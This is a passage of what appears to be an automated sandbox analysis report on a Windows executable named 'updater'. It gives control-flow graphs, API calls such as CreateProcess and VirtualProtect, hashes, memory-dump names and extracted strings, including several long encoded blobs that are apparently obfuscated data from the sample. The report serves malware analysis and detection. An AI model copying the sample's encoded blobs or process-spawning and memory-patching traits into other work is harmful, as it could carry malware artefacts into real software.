                                          • Associated: 00000024.00000002.345290666328.00007FF758EEA000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345290696586.00007FF758EED000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345291208598.00007FF75916C000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345291242321.00007FF759170000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345291242321.00007FF75917F000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_36_2_7ff758ee0000_updater.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 1d3dcb4b41951578468dfebce8a3b5ee3b4e38d1bfb761ac12e8c11205364101
                                          • Instruction ID: 5045e4ece0a1220cac7bbaa1a7439c99ce53f3fd2f625b4613ba6f20e5ecad7b
                                          • Opcode Fuzzy Hash: 1d3dcb4b41951578468dfebce8a3b5ee3b4e38d1bfb761ac12e8c11205364101
                                          • Instruction Fuzzy Hash: DCF0C971A0CB5597D610EB55F84113AF7B2FB49380B48483AE98C43729CF3CE151CB68

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 42 7ff758ee6779-7ff758ee6780 43 7ff758ee6786-7ff758ee6819 42->43 44 7ff758ee6820-7ff758ee68be wcslen call 7ff758ee153f call 7ff758ee145e 42->44 43->44 49 7ff758ee68c4-7ff758ee68cb 44->49 50 7ff758ee6948-7ff758ee695c 44->50 49->50 52 7ff758ee68cd-7ff758ee693e call 7ff758ee2f70 call 7ff758ee39c0 call 7ff758ee14c7 49->52 53 7ff758ee69a5-7ff758ee69ca wcslen 50->53 54 7ff758ee695e-7ff758ee699e 50->54 52->50 70 7ff758ee6940-7ff758ee6943 call 7ff758ee145e 52->70 59 7ff758ee69d0-7ff758ee69e0 _wcsnicmp 53->59 54->53 61 7ff758ee69e6-7ff758ee69fa wcslen 59->61 62 7ff758ee6aec 59->62 61->59 65 7ff758ee69fc 61->65 63 7ff758ee6af0-7ff758ee6b04 62->63 68 7ff758ee6b06-7ff758ee6b62 63->68 69 7ff758ee6b69-7ff758ee6c21 memset wcscpy wcscat call 7ff758ee2f70 call 7ff758ee3350 call 7ff758ee14c7 memset 63->69 65->63 68->69 78 7ff758ee7fbc-7ff758ee7ffe call 7ff758ee1370 69->78 79 7ff758ee6c27-7ff758ee6c2e 69->79 70->50 81 7ff758ee6c30-7ff758ee6c70 78->81 87 7ff758ee8004 78->87 79->81 82 7ff758ee6c77-7ff758ee6c87 wcslen 79->82 81->82 84 7ff758ee6cc9-7ff758ee6ccb 82->84 85 7ff758ee6c89-7ff758ee6c95 82->85 86 7ff758ee6cd1-7ff758ee6cfb wcscat memset 84->86 88 7ff758ee6ca0-7ff758ee6cb0 _wcsnicmp 85->88 89 7ff758ee6d01-7ff758ee6d08 86->89 90 7ff758ee8009-7ff758ee8054 call 7ff758ee1370 86->90 87->82 91 7ff758ee6cb2-7ff758ee6cc5 wcslen 88->91 92 7ff758ee6ccd 88->92 94 7ff758ee6d64-7ff758ee6d93 wcscpy wcscat 89->94 95 7ff758ee6d0a-7ff758ee6d5d 89->95 90->95 102 7ff758ee805a 90->102 91->88 93 7ff758ee6cc7 91->93 92->86 93->86 97 7ff758ee805f-7ff758ee8085 call 7ff758ee97d0 call 7ff758ee1370 94->97 98 7ff758ee6d99-7ff758ee6da0 94->98 95->94 100 7ff758ee6da6-7ff758ee6e50 97->100 115 7ff758ee808b 97->115 98->100 101 7ff758ee6e57-7ff758ee6e5e 98->101 100->101 104 7ff758ee6e64-7ff758ee6e6b 101->104 105 7ff758ee8090-7ff758ee80d2 call 7ff758ee1370 101->105 102->94 108 7ff758ee6eb4-7ff758ee6ebb 104->108 109 7ff758ee6e6d-7ff758ee6ead 104->109 
105->109 116 7ff758ee80d8 105->116 113 7ff758ee6ec1-7ff758ee6ec8 108->113 114 7ff758ee80dd-7ff758ee8117 memcpy call 7ff758ee1370 108->114 109->108 118 7ff758ee6f7f-7ff758ee701d wcslen call 7ff758ee153f call 7ff758ee145e 113->118 119 7ff758ee6ece-7ff758ee6eea 113->119 114->119 126 7ff758ee811d 114->126 115->101 116->108 129 7ff758ee70b3 118->129 130 7ff758ee7023-7ff758ee702a 118->130 122 7ff758ee6ef0-7ff758ee6f1e 119->122 123 7ff758ee6f20-7ff758ee6f4a 122->123 124 7ff758ee6f4c-7ff758ee6f78 122->124 123->122 124->118 126->118 131 7ff758ee70bf-7ff758ee70db 129->131 132 7ff758ee70ba call 7ff758ee145e 129->132 130->129 133 7ff758ee7030-7ff758ee70a9 call 7ff758ee2f70 call 7ff758ee39c0 call 7ff758ee14c7 130->133 132->131 133->129 140 7ff758ee70ab-7ff758ee70ae call 7ff758ee145e 133->140 140->129
                                          APIs
                                          Strings
                                          • JisRZGtzaG50dGdrc3N2eWxkaGJic290K2JiY3lrdGNrcWlkanNobnB0Z2tzc3Z5bGRoYmJzb3RrYmJjAWt0Y2Vu02pqx2GjUcxmJ75SIhEFF0gSEBwIBgoPQgAYBRoMH1ELAUoBHQBQHQlLNzwlWQELDAdMV290OydiYx3tc2PEo3YCanNobnB0Z2uDc1R5Z2ZmYmIhb3RrQmJjeWt0YytgaWRqY2hucHRnK3JzdnlsdGhiYnFvdG1iYmN5a3RjbXFp, xrefs: 00007FF758EE68CD
                                          • Jiv5ZGlzaG50dGdrjIx2edRkaGJic290K2JiY3lrdGNrcWlkanNobnB0Z2tzc3Z5bGRoYmJzb3RrYmJjmWt0Y2Vu02pqx2GjUcxmJ75SIhEFF0gSEBwIBgoPQgAYBRoMH1ELAUoBHQBQHQlLNzwlWQELDAdMfmJ+T2JiY3lrdGNeSweYGyhowQEvZ8QCKHbWHT9pzR8ob9s9/xnMDTB0zD3sFMsaKGjBJukKxAEodtY6+RnNEihv2z3/HswJMHTMPewR, xrefs: 00007FF758EE6BA5
                                          • Jiv5ZGlzaG50dGdrjIx2edRkaGJic290K2JiY3lrdGNrcWlkanNobnB0Z2tzc3Z5bGRoYmJzb3RrYmJjUWp0Y2Vu02pqx2GjUcxmJ75SIhEFF0gSEBwIBgoPQgAYBRoMH1ELAUoBHQBQHQlLNzwlWQELDAdMfmJ+T2JiY3lrdGNWAZI9E2L9ZAll8mEKYuNzXg3+aRJi+n5ZC/Jo0XrhaVkY+G8FYv1kHBoPYQ5i43MACvlpCGL6fgcM8mhpeuFpBx//, xrefs: 00007FF758EE7030
                                          • X&, xrefs: 00007FF758EE703E
                                          • 0, xrefs: 00007FF758EE6FCB
                                          Memory Dump Source
                                          • Source File: 00000024.00000002.345290631624.00007FF758EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF758EE0000, based on PE: true
                                          • Associated: 00000024.00000002.345290597107.00007FF758EE0000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345290666328.00007FF758EEA000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345290696586.00007FF758EED000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345291208598.00007FF75916C000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345291242321.00007FF759170000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345291242321.00007FF75917F000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_36_2_7ff758ee0000_updater.jbxd
                                          Similarity
                                          • API ID: wcslen$_wcsnicmp
                                          • String ID: 0$JisRZGtzaG50dGdrc3N2eWxkaGJic290K2JiY3lrdGNrcWlkanNobnB0Z2tzc3Z5bGRoYmJzb3RrYmJjAWt0Y2Vu02pqx2GjUcxmJ75SIhEFF0gSEBwIBgoPQgAYBRoMH1ELAUoBHQBQHQlLNzwlWQELDAdMV290OydiYx3tc2PEo3YCanNobnB0Z2uDc1R5Z2ZmYmIhb3RrQmJjeWt0YytgaWRqY2hucHRnK3JzdnlsdGhiYnFvdG1iYmN5a3RjbXFp$Jiv5ZGlzaG50dGdrjIx2edRkaGJic290K2JiY3lrdGNrcWlkanNobnB0Z2tzc3Z5bGRoYmJzb3RrYmJjUWp0Y2Vu02pqx2GjUcxmJ75SIhEFF0gSEBwIBgoPQgAYBRoMH1ELAUoBHQBQHQlLNzwlWQELDAdMfmJ+T2JiY3lrdGNWAZI9E2L9ZAll8mEKYuNzXg3+aRJi+n5ZC/Jo0XrhaVkY+G8FYv1kHBoPYQ5i43MACvlpCGL6fgcM8mhpeuFpBx//$Jiv5ZGlzaG50dGdrjIx2edRkaGJic290K2JiY3lrdGNrcWlkanNobnB0Z2tzc3Z5bGRoYmJzb3RrYmJjmWt0Y2Vu02pqx2GjUcxmJ75SIhEFF0gSEBwIBgoPQgAYBRoMH1ELAUoBHQBQHQlLNzwlWQELDAdMfmJ+T2JiY3lrdGNeSweYGyhowQEvZ8QCKHbWHT9pzR8ob9s9/xnMDTB0zD3sFMsaKGjBJukKxAEodtY6+RnNEihv2z3/HswJMHTMPewR$X&
                                          • API String ID: 4256727079-2301014438
                                          • Opcode ID: 2ad9b95b428851b68ec7e9912ffa00502d73405e26e9a561cf93f4fe1461c13d
                                          • Instruction ID: 877d4e83e87e088788ec62e639415cb135be92b4cb198a829430663728ad666a
                                          • Opcode Fuzzy Hash: 2ad9b95b428851b68ec7e9912ffa00502d73405e26e9a561cf93f4fe1461c13d
                                          • Instruction Fuzzy Hash: 6E426422D1C6E285FB21BF29E9412F4E374AF95384FCC423AD98D56AA1EF7C6145C324

                                          Control-flow Graph

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000024.00000002.345290631624.00007FF758EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF758EE0000, based on PE: true
                                          • Associated: 00000024.00000002.345290597107.00007FF758EE0000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345290666328.00007FF758EEA000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345290696586.00007FF758EED000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345291208598.00007FF75916C000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345291242321.00007FF759170000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345291242321.00007FF75917F000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_36_2_7ff758ee0000_updater.jbxd
                                          Similarity
                                          • API ID: malloc$ExceptionFilterUnhandled_cexit_inittermmemcpystrlen
                                          • String ID: &
                                          • API String ID: 3825114775-1499360005
                                          • Opcode ID: fb30249d2068266854ec9e895c86aedb2bf09c1cf0466ecf682e59239ecf8f1d
                                          • Instruction ID: b2dc16cbcfa259594cb04a83b34aa5d8f342aa7cb4a924a5a866e7fb0dfd88da
                                          • Opcode Fuzzy Hash: fb30249d2068266854ec9e895c86aedb2bf09c1cf0466ecf682e59239ecf8f1d
                                          • Instruction Fuzzy Hash: CC414C65E09AA282FA01BF15E850379E7B1AF44781FD8403ACA4D477A1DF3CE481C328

                                          Control-flow Graph

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000024.00000002.345290631624.00007FF758EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF758EE0000, based on PE: true
                                          • Associated: 00000024.00000002.345290597107.00007FF758EE0000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345290666328.00007FF758EEA000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345290696586.00007FF758EED000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345291208598.00007FF75916C000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345291242321.00007FF759170000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345291242321.00007FF75917F000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_36_2_7ff758ee0000_updater.jbxd
                                          Similarity
                                          • API ID: memset$wcscatwcscpywcslen
                                          • String ID: $0$0$@$@
                                          • API String ID: 4263182637-1413854666
                                          • Opcode ID: f0c1ed3e0b43149840575df363cb09832e7bcaaaea9c741d1618f9adab6ccee0
                                          • Instruction ID: d9274252410324ab59280d55f8fe4599b29f4ccb110c37a9353a1a125fb00035
                                          • Opcode Fuzzy Hash: f0c1ed3e0b43149840575df363cb09832e7bcaaaea9c741d1618f9adab6ccee0
                                          • Instruction Fuzzy Hash: B0B1B22190C6E286F721AF15F4453BAF7B0FF80344F98413AEA8846A95DF7CE586CB54

                                          Control-flow Graph

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000024.00000002.345290631624.00007FF758EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF758EE0000, based on PE: true
                                          • Associated: 00000024.00000002.345290597107.00007FF758EE0000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345290666328.00007FF758EEA000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345290696586.00007FF758EED000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345291208598.00007FF75916C000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345291242321.00007FF759170000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345291242321.00007FF75917F000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_36_2_7ff758ee0000_updater.jbxd
                                          Similarity
                                          • API ID: wcslen$memsetwcscatwcscpywcsncmp
                                          • String ID: 0$X$`
                                          • API String ID: 329590056-2527496196
                                          • Opcode ID: bf7d6d7f09f5688ba25f00927fe5a74f17b49469571986f60aaf0f4e4d97f406
                                          • Instruction ID: d199a021da1e44111138413e632118e7c98eb981af62fc9f8c06add61949d431
                                          • Opcode Fuzzy Hash: bf7d6d7f09f5688ba25f00927fe5a74f17b49469571986f60aaf0f4e4d97f406
                                          • Instruction Fuzzy Hash: 03029122918BD182EB20AF15E8443AAF7B0FB85794F99423ADA9C07BE5DF7CD144C714

                                          Control-flow Graph

                                          APIs
                                          • VirtualQuery.KERNEL32(?,?,?,?,00007FF758EEB914,00007FF758EEB914,?,?,00007FF758EE0000,?,00007FF758EE1991), ref: 00007FF758EE1C63
                                          • VirtualProtect.KERNEL32(?,?,?,?,00007FF758EEB914,00007FF758EEB914,?,?,00007FF758EE0000,?,00007FF758EE1991), ref: 00007FF758EE1CC7
                                          • memcpy.MSVCRT ref: 00007FF758EE1CE0
                                          • GetLastError.KERNEL32(?,?,?,?,00007FF758EEB914,00007FF758EEB914,?,?,00007FF758EE0000,?,00007FF758EE1991), ref: 00007FF758EE1D23
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000024.00000002.345290631624.00007FF758EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF758EE0000, based on PE: true
                                          • Associated: 00000024.00000002.345290597107.00007FF758EE0000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345290666328.00007FF758EEA000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345290696586.00007FF758EED000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345291208598.00007FF75916C000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345291242321.00007FF759170000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345291242321.00007FF75917F000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_36_2_7ff758ee0000_updater.jbxd
                                          Similarity
                                          • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                          • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                          • API String ID: 2595394609-2123141913
                                          • Opcode ID: 2987fb7c94cd36b2a58051b304da944e2302a15d1c826c7cf92839f9f5faa279
                                          • Instruction ID: c945a178fe8c2aa302e78e176daf73e39fdbc123c0e2adcd718df311bd877e51
                                          • Opcode Fuzzy Hash: 2987fb7c94cd36b2a58051b304da944e2302a15d1c826c7cf92839f9f5faa279
                                          • Instruction Fuzzy Hash: D7419361A085A692EE14BF51D8406B8E7B0EF44B85F98443BCD0D8B791DF3CE585C328

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000024.00000002.345290631624.00007FF758EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF758EE0000, based on PE: true
                                          • Associated: 00000024.00000002.345290597107.00007FF758EE0000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345290666328.00007FF758EEA000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345290696586.00007FF758EED000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345291208598.00007FF75916C000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345291242321.00007FF759170000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345291242321.00007FF75917F000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_36_2_7ff758ee0000_updater.jbxd
                                          Similarity
                                          • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                          • String ID:
                                          • API String ID: 3326252324-0
                                          • Opcode ID: fd209cddb1df165fe120bb66cf544e8d6e83d75e697be01662b719c901dee52c
                                          • Instruction ID: c1d9bf2b8497792f0b238c8a41aa57cd5b6328fb999b63d5b68048d02f2a7b6c
                                          • Opcode Fuzzy Hash: fd209cddb1df165fe120bb66cf544e8d6e83d75e697be01662b719c901dee52c
                                          • Instruction Fuzzy Hash: AD21C320E0DA6283FA19BF01E950274E370BF44B90FDD043AD91E57AA4DF7DA9468328

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 307 7ff758ee1e10-7ff758ee1e2d 308 7ff758ee1e2f-7ff758ee1e38 307->308 309 7ff758ee1e3e-7ff758ee1e48 307->309 308->309 310 7ff758ee1f60-7ff758ee1f69 308->310 311 7ff758ee1ea3-7ff758ee1ea8 309->311 312 7ff758ee1e4a-7ff758ee1e53 309->312 311->310 315 7ff758ee1eae-7ff758ee1eb3 311->315 313 7ff758ee1e55-7ff758ee1e60 312->313 314 7ff758ee1ecc-7ff758ee1ed1 312->314 313->311 318 7ff758ee1f23-7ff758ee1f2d 314->318 319 7ff758ee1ed3-7ff758ee1ee2 signal 314->319 316 7ff758ee1eb5-7ff758ee1eba 315->316 317 7ff758ee1efb-7ff758ee1f0a call 7ff758ee9f80 315->317 316->310 322 7ff758ee1ec0 316->322 317->318 328 7ff758ee1f0c-7ff758ee1f10 317->328 320 7ff758ee1f43-7ff758ee1f45 318->320 321 7ff758ee1f2f-7ff758ee1f3f 318->321 319->318 323 7ff758ee1ee4-7ff758ee1ee8 319->323 320->310 321->320 322->318 326 7ff758ee1f4e-7ff758ee1f53 323->326 327 7ff758ee1eea-7ff758ee1ef9 signal 323->327 329 7ff758ee1f5a 326->329 327->310 330 7ff758ee1f55 328->330 331 7ff758ee1f12-7ff758ee1f21 signal 328->331 329->310 330->329 331->310
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000024.00000002.345290631624.00007FF758EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF758EE0000, based on PE: true
                                          • Associated: 00000024.00000002.345290597107.00007FF758EE0000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345290666328.00007FF758EEA000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345290696586.00007FF758EED000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345291208598.00007FF75916C000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345291242321.00007FF759170000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345291242321.00007FF75917F000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_36_2_7ff758ee0000_updater.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: CCG
                                          • API String ID: 0-1584390748
                                          • Opcode ID: a19b5ea743c64a015226f88ea68dd99b9d0cf90ba8dc366ff5ce5a6acfb792c5
                                          • Instruction ID: 5e0582e3e2916f0baf6182931e0144dca8f16c3dad8855c8324520a29b46cb81
                                          • Opcode Fuzzy Hash: a19b5ea743c64a015226f88ea68dd99b9d0cf90ba8dc366ff5ce5a6acfb792c5
                                          • Instruction Fuzzy Hash: 76219F22E0C12643FA747614AD80379D1A19F847A6FAC853BD91D4B3D8CE3CA8C1C2A9

                                          Control-flow Graph

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000024.00000002.345290631624.00007FF758EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF758EE0000, based on PE: true
                                          • Associated: 00000024.00000002.345290597107.00007FF758EE0000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345290666328.00007FF758EEA000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345290696586.00007FF758EED000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345291208598.00007FF75916C000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345291242321.00007FF759170000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345291242321.00007FF75917F000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_36_2_7ff758ee0000_updater.jbxd
                                          Similarity
                                          • API ID: wcslen
                                          • String ID: 0$@
                                          • API String ID: 4088430540-1545510068
                                          • Opcode ID: bba2083c9aafad6c564e99380eb9ae7bf51f5fbee20126f4752a7ce338e2db8c
                                          • Instruction ID: 996f8c85c13a88d8588ec0e51640fce71698ba1c85ad7f17ac711d5946b329ae
                                          • Opcode Fuzzy Hash: bba2083c9aafad6c564e99380eb9ae7bf51f5fbee20126f4752a7ce338e2db8c
                                          • Instruction Fuzzy Hash: C5118C2252868082E310AB14F44579AF3B4FFD43A4F540129F68C83B68EF3DC18ACB40

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 340 7ff758ee1880-7ff758ee189c 341 7ff758ee1a0f-7ff758ee1a1f 340->341 342 7ff758ee18a2-7ff758ee18f9 call 7ff758ee2420 call 7ff758ee2660 340->342 342->341 347 7ff758ee18ff-7ff758ee1910 342->347 348 7ff758ee1912-7ff758ee191c 347->348 349 7ff758ee193e-7ff758ee1941 347->349 350 7ff758ee191e-7ff758ee1929 348->350 351 7ff758ee194d-7ff758ee1954 348->351 349->351 352 7ff758ee1943-7ff758ee1947 349->352 350->351 353 7ff758ee192b-7ff758ee193a 350->353 355 7ff758ee1956-7ff758ee1961 351->355 356 7ff758ee199e-7ff758ee19a6 351->356 352->351 354 7ff758ee1a20-7ff758ee1a26 352->354 353->349 357 7ff758ee1a2c-7ff758ee1a37 354->357 358 7ff758ee1b87-7ff758ee1b98 call 7ff758ee1d40 354->358 359 7ff758ee1970-7ff758ee199c call 7ff758ee1ba0 355->359 356->341 360 7ff758ee19a8-7ff758ee19c1 356->360 357->356 363 7ff758ee1a3d-7ff758ee1a5f 357->363 359->356 361 7ff758ee19df-7ff758ee19e7 360->361 365 7ff758ee19d0-7ff758ee19dd 361->365 366 7ff758ee19e9-7ff758ee1a0d VirtualProtect 361->366 368 7ff758ee1a7d-7ff758ee1a97 363->368 365->341 365->361 366->365 370 7ff758ee1b74-7ff758ee1b82 call 7ff758ee1d40 368->370 371 7ff758ee1a9d-7ff758ee1afa 368->371 370->358 376 7ff758ee1b22-7ff758ee1b26 371->376 377 7ff758ee1afc-7ff758ee1b0e 371->377 380 7ff758ee1a70-7ff758ee1a77 376->380 381 7ff758ee1b2c-7ff758ee1b30 376->381 378 7ff758ee1b10-7ff758ee1b20 377->378 379 7ff758ee1b5c-7ff758ee1b6f call 7ff758ee1d40 377->379 378->376 378->379 379->370 380->356 380->368 381->380 382 7ff758ee1b36-7ff758ee1b53 call 7ff758ee1ba0 381->382 386 7ff758ee1b57 382->386 386->386
                                          APIs
                                          • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF758EE1247), ref: 00007FF758EE19F9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000024.00000002.345290631624.00007FF758EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF758EE0000, based on PE: true
                                          • Associated: 00000024.00000002.345290597107.00007FF758EE0000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345290666328.00007FF758EEA000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345290696586.00007FF758EED000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345291208598.00007FF75916C000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345291242321.00007FF759170000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345291242321.00007FF75917F000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_36_2_7ff758ee0000_updater.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                          • API String ID: 544645111-395989641
                                          • Opcode ID: a96b84c6a29362a5831d93957ea7165e458f8b3424253329cfa7517644b3fa32
                                          • Instruction ID: 5ec345b4b9abb59d16aa04ddd34e5d6fe98237a8ff336e1d178319f400943754
                                          • Opcode Fuzzy Hash: a96b84c6a29362a5831d93957ea7165e458f8b3424253329cfa7517644b3fa32
                                          • Instruction Fuzzy Hash: 8C515C21F085A6C7EB10BF21E8417B8E771AB14B99F98413AD91C0B794DF3DE886C724

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 387 7ff758ee1800-7ff758ee1810 388 7ff758ee1824 387->388 389 7ff758ee1812-7ff758ee1822 387->389 390 7ff758ee182b-7ff758ee1867 call 7ff758ee2290 fprintf 388->390 389->390
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000024.00000002.345290631624.00007FF758EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF758EE0000, based on PE: true
                                          • Associated: 00000024.00000002.345290597107.00007FF758EE0000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345290666328.00007FF758EEA000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345290696586.00007FF758EED000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345291208598.00007FF75916C000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345291242321.00007FF759170000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345291242321.00007FF75917F000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_36_2_7ff758ee0000_updater.jbxd
                                          Similarity
                                          • API ID: fprintf
                                          • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                          • API String ID: 383729395-3474627141
                                          • Opcode ID: 6dbf5a7c010a93ffdc521eff69b8f13d2c87c304966384c1bf5507061ee5eef1
                                          • Instruction ID: c4613551c5bcd269263ff8e4bf869d4b65bbc5a232ea839450ddc42d1bbf1bea
                                          • Opcode Fuzzy Hash: 6dbf5a7c010a93ffdc521eff69b8f13d2c87c304966384c1bf5507061ee5eef1
                                          • Instruction Fuzzy Hash: 55F0C211E18AA583E610BB24A9410B9E370EB593C1F88923AEE4D57251EF3CF182C314

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000024.00000002.345290631624.00007FF758EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF758EE0000, based on PE: true
                                          • Associated: 00000024.00000002.345290597107.00007FF758EE0000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345290666328.00007FF758EEA000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345290696586.00007FF758EED000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345291208598.00007FF75916C000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345291242321.00007FF759170000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345291242321.00007FF75917F000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_36_2_7ff758ee0000_updater.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterErrorLastLeaveValue
                                          • String ID:
                                          • API String ID: 682475483-0
                                          • Opcode ID: 2528049f67c3bbc59b914fdf468fc705937388fb34f79aa992765da7661b039a
                                          • Instruction ID: 886dd62bff442fe0cdeb424fa64847b480e36355587d097ef9a4e468900cd73b
                                          • Opcode Fuzzy Hash: 2528049f67c3bbc59b914fdf468fc705937388fb34f79aa992765da7661b039a
                                          • Instruction Fuzzy Hash: 2D010825E0D66293FA06BF51ED00234D370BB44B90FDD043ADA0D53AA4DF3DA996C324
